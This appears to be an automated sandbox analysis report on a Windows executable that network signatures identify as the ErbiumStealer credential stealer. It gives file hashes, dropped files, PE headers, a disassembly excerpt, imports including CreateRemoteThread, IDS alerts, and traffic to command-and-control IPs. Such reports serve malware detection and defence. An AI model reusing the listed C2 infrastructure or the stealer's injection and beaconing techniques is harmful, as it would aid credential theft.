                                                                                                                                    https://nimb.ws/C1lZ8uGet hashmaliciousBrowse
                                                                                                                                    • 151.101.1.26
                                                                                                                                    http://affide.2616.tetline.com/#rudi.ritsch@affide.itGet hashmaliciousBrowse
                                                                                                                                    • 151.101.112.193
                                                                                                                                    RSHB-ASRU2MNB4UhUqR.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.152.20
                                                                                                                                    w9d568i4Ia.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.152.128
                                                                                                                                    3pqdFTqin9.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.152.128
                                                                                                                                    nJX6vEzSO5.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.153.31
                                                                                                                                    X3JoqrBG6b.dllGet hashmaliciousBrowse
                                                                                                                                    • 194.190.152.209
                                                                                                                                    Hlf35fELn8.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.152.209
                                                                                                                                    U6EbIncPHD.exeGet hashmaliciousBrowse
                                                                                                                                    • 194.190.153.41
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19merci.arellano_voice_Records_10_3_2022 11_35_52 a.m..htmlGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    greitenk RemittanceCopy947.shtml.htmlGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    https://de0009827.s3.eu-central-1.amazonaws.com/ing.htmlGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_9.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_6.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_8.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_9.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_2.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_6.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    telem_8.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    https://hotgrls1192.page.link/qWeqGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    http://assurancewirelessebb.shop/?dD1jJmQ9ODI2NzkmbD0xMjU0MiZjPTcyOTA4Get hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    88wfAIx84e.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    K2yC5Pi15r.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    YzRrXUeegw.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    6JawAgVJ1V.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 185.199.108.133
                                                                                                                                    • 140.82.121.3
                                                                                                                                    No context
                                                                                                                                    Process:C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):192000
                                                                                                                                    Entropy (8bit):6.561480398057642
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:WkUzWX6Fs5W06pVeuRvSmc6UAu8NWtTksgE0WnGr5YJOR35RMccQ6nn:EzWX62U5pVPYm4Au82Xg4a5Wcbwn
                                                                                                                                    MD5:8DD297E546397E6982E7350E4F9F154A
                                                                                                                                    SHA1:779C4A41972CB60DDA11FB67551288495ACC2F30
                                                                                                                                    SHA-256:686889C69F053F5B09E8214B1F2C5EE59F45A3F60890ADB3441DEBE5D409AFD0
                                                                                                                                    SHA-512:C04F0F94BCA6082564CBC1C8159EFA6C6DF8291932803A210DCCCB22E20B274F094438008CFF5AC227C205FEBAE8F1EA1E6EA91FAE4182AA6A1A0988CE7C33E6
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......fif4"..g"..g"..g...g)..g...g...g...g:..gq+.g ..go+.g#..g...g#..gp`.f3..gp`.f5..gp`.f...g+p.g+..g"..g...g.a.f+..g.a.g#..g.a.f#..gRich"..g........................PE..L...;.)b.................*...................@....@..........................0............@.....................................x......................................8...............................@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28672
                                                                                                                                    Entropy (8bit):1.4755077381471955
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.7876734657715041
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                    MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                    SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                    SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                    SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):147456
                                                                                                                                    Entropy (8bit):0.7217007190866341
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                    MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                    SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                    SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                    SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):94208
                                                                                                                                    Entropy (8bit):1.2882898331044472
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                    MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                    SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                    SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                    SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):192000
                                                                                                                                    Entropy (8bit):6.561480398057642
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:WkUzWX6Fs5W06pVeuRvSmc6UAu8NWtTksgE0WnGr5YJOR35RMccQ6nn:EzWX62U5pVPYm4Au82Xg4a5Wcbwn
                                                                                                                                    MD5:8DD297E546397E6982E7350E4F9F154A
                                                                                                                                    SHA1:779C4A41972CB60DDA11FB67551288495ACC2F30
                                                                                                                                    SHA-256:686889C69F053F5B09E8214B1F2C5EE59F45A3F60890ADB3441DEBE5D409AFD0
                                                                                                                                    SHA-512:C04F0F94BCA6082564CBC1C8159EFA6C6DF8291932803A210DCCCB22E20B274F094438008CFF5AC227C205FEBAE8F1EA1E6EA91FAE4182AA6A1A0988CE7C33E6
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......fif4"..g"..g"..g...g)..g...g...g...g:..gq+.g ..go+.g#..g...g#..gp`.f3..gp`.f5..gp`.f...g+p.g+..g"..g...g.a.f+..g.a.g#..g.a.f#..gRich"..g........................PE..L...;.)b.................*...................@....@..........................0............@.....................................x......................................8...............................@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):168
                                                                                                                                    Entropy (8bit):6.844465636961467
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U+0eKMQtxr7FXg0wzMzZTK08HvxPZYA0Mwgk+iFujP5TSuI0J0rqhedT:UeK9Dq2ZTKJPxPm5WiFweuIY0aQ
                                                                                                                                    MD5:84497C045CF1E517A13E0B332ED3BEE7
                                                                                                                                    SHA1:D765DF58493E85426063CD6076E42AE85DC49FFD
                                                                                                                                    SHA-256:36F8EF3CCDBB6175587096E7839B84CE85BD02E75CE9BBD091E8FEECE21D600E
                                                                                                                                    SHA-512:A71EA5F5B0BA899AC6E431FE53EDCB3EB9E59FBDBF7FFA42B692B66092906C192BBCBE711AD216FCA86977D4E9E5D3BD9E7FD668828329F1DD005F0E9FAA152F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:./.c.O/T]i..~..{!A..n.s........t........2H..o.7......7 Q.~....>oi.@. GL..)....1V...J.D....8.6.P}..f....{.[.y.I.....u.$..\.T.....7.RDK..?...T..#(J...*.W..6
                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):5.165317827339626
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:EgNIXduB6T.exe
                                                                                                                                    File size:7168
                                                                                                                                    MD5:31d7dfe9c9f72bc7ad828091531e6544
                                                                                                                                    SHA1:c3449ef86baf2064885cec6b066d0f0f27304d0f
                                                                                                                                    SHA256:16de5442d1f76e68a5167e3d8050b30276fdc3db361a420d9420e724feffe138
                                                                                                                                    SHA512:0f57577bf2ce540d6ba1f47efd76ccac43afe495b504755bf79e2e7ea31849065d61443fce7215af6848a884dc965a80abcbe308a2f485228d8c87aef0a02643
                                                                                                                                    SSDEEP:96:3m2unjKp7Y5DkYoCYNiESNfWNsn8WEmO8qQuD1oCbyRTq8hatFS32hWN3QU:3Kup7iDkYDxNeNejEmO8q7xlbuTXU3
                                                                                                                                    TLSH:BDE1C701EB425729D9D648F081354B8AF56D9B312B306AF7B0FE6C5ECFA57D07828623
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7..LV..LV..LV...$..IV..LV..\V..-,..OV..-,..MV..RichLV..........PE..L....a.c............... ..................... ....@........
                                                                                                                                    Icon Hash:00828e8e8686b000
                                                                                                                                    Entrypoint:0x4016f0
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x631C61D7 [Sat Sep 10 10:07:19 2022 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:6
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:6
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:6
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:e2cf7e9b7ea276e49dd6f9224087577b
                                                                                                                                    Instruction
                                                                                                                                    call 00007F55C913DC50h
                                                                                                                                    xor eax, eax
                                                                                                                                    retn 0010h
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 00000088h
                                                                                                                                    mov dword ptr [ebp-1Ch], 00000000h
                                                                                                                                    mov dword ptr [ebp-24h], 00000000h
                                                                                                                                    mov dword ptr [ebp-28h], 00000000h
                                                                                                                                    mov dword ptr [ebp-08h], 00000000h
                                                                                                                                    push 004022FCh
                                                                                                                                    call dword ptr [00402008h]
                                                                                                                                    mov dword ptr [ebp-0Ch], eax
                                                                                                                                    cmp dword ptr [ebp-0Ch], 00000000h
                                                                                                                                    je 00007F55C913E0FBh
                                                                                                                                    push 0040230Ch
                                                                                                                                    mov eax, dword ptr [ebp-0Ch]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-30h], eax
                                                                                                                                    push 0040231Ch
                                                                                                                                    mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                    push ecx
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-44h], eax
                                                                                                                                    push 00402330h
                                                                                                                                    mov edx, dword ptr [ebp-0Ch]
                                                                                                                                    push edx
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-20h], eax
                                                                                                                                    push 00402344h
                                                                                                                                    mov eax, dword ptr [ebp-0Ch]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                    push 00402354h
                                                                                                                                    mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                    push ecx
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-48h], eax
                                                                                                                                    push 00402360h
                                                                                                                                    mov edx, dword ptr [ebp-0Ch]
                                                                                                                                    push edx
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    mov dword ptr [ebp-4Ch], eax
                                                                                                                                    push 00402374h
                                                                                                                                    mov eax, dword ptr [ebp-0Ch]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [00402004h]
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x23d40x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x40000xb0.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x23a00x1c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x48.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000xe1f0x1000False0.4833984375data5.574964695613325IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x20000x5ac0x600False0.451171875data4.319528586318783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x30000x40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .reloc0x40000xb00x200False0.375data2.7475912683230717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    DLLImport
                                                                                                                                    WINHTTP.dllWinHttpOpenRequest, WinHttpReceiveResponse, WinHttpOpen, WinHttpReadData, WinHttpQueryDataAvailable, WinHttpCloseHandle, WinHttpSendRequest, WinHttpConnect
                                                                                                                                    KERNEL32.dllCreateRemoteThread, GetProcAddress, LoadLibraryA, GetSystemInfo, MultiByteToWideChar, VirtualAlloc, GetCurrentProcess, VirtualFree
                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                    192.168.2.3194.190.152.19449695802022986 10/10/22-06:02:03.227726TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4969580192.168.2.3194.190.152.194
                                                                                                                                    194.190.152.194192.168.2.380496942038746 10/10/22-06:01:58.008772TCP2038746ET TROJAN ErbiumStealer Response From CnC8049694194.190.152.194192.168.2.3
                                                                                                                                    194.190.152.194192.168.2.380496922009897 10/10/22-06:01:56.609735TCP2009897ET TROJAN Possible Windows executable sent when remote host claims to send html content8049692194.190.152.194192.168.2.3
                                                                                                                                    192.168.2.3194.190.152.19449692802038723 10/10/22-06:01:56.533441TCP2038723ET TROJAN ErbiumStealer Variant CnC Activity (getstub)4969280192.168.2.3194.190.152.194
                                                                                                                                    192.168.2.3194.190.152.19449694802022986 10/10/22-06:01:57.946506TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4969480192.168.2.3194.190.152.194
                                                                                                                                    77.73.133.53192.168.2.380496932038745 10/10/22-06:01:57.884049TCP2038745ET TROJAN ErbiumStealer Response From Panel804969377.73.133.53192.168.2.3
                                                                                                                                    192.168.2.3194.190.152.19449695802017930 10/10/22-06:02:03.227726TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4969580192.168.2.3194.190.152.194
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 10, 2022 06:01:56.406352043 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:56.429163933 CEST804969177.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.429433107 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:56.435987949 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:56.458492041 CEST804969177.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.459347963 CEST804969177.73.133.53192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.464965105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.506356955 CEST4969180192.168.2.377.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:56.527187109 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.527412891 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.533441067 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.596173048 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609735012 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609793901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609834909 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609870911 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609910011 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609946966 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.609944105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.609944105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.609987020 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.610009909 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.610024929 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.610060930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.610091925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.610100985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.610147953 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.671849012 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.671920061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.671961069 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.671993971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672036886 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672100067 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672101021 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672107935 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672149897 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672185898 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672193050 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672234058 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672274113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672288895 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672314882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672334909 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672355890 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672411919 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672424078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672466993 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672508001 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672522068 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672549009 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672591925 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672604084 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672632933 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672673941 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672691107 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.672715902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.672774076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734339952 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734407902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734450102 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734492064 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734535933 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734579086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734636068 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734654903 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734654903 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734654903 CEST4969280192.168.2.3194.190.152.194
